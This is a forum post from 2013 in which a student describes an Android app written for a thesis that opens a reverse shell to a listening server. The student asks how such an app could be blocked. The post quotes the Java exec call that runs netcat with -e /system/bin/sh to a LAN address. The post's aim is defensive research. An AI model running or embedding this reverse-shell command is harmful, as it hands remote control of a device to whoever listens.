Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie

Android Security Flaw - Fix?

Options
  • 12-08-2013 6:26pm
    Registered Users Posts: 1,127 ✭✭✭

Hey there,

I asked this question in an old thread I have open but decided to open a new thread.

I'm wondering if anyone here has any experience with Android development and the security aspects to it.

As part of my thesis I wrote an app that sends a reverse shell back to a listening server using netcat.

It uses the java function "runtime.getruntime().exec("nc 192.168.1.5 -e /system/bin/sh")" to execute the netcat command.

I'm trying to come up with a suggestion in my thesis that would prevent this app from working but I'm coming unstuck. I had thought of somehow blocking runtime.getruntime().exec but not sure if this is even possible or feasible. Im guessing it would have to be done somewhere deep into the OS.

Anyone know anything about this?

Cheers

Advertisement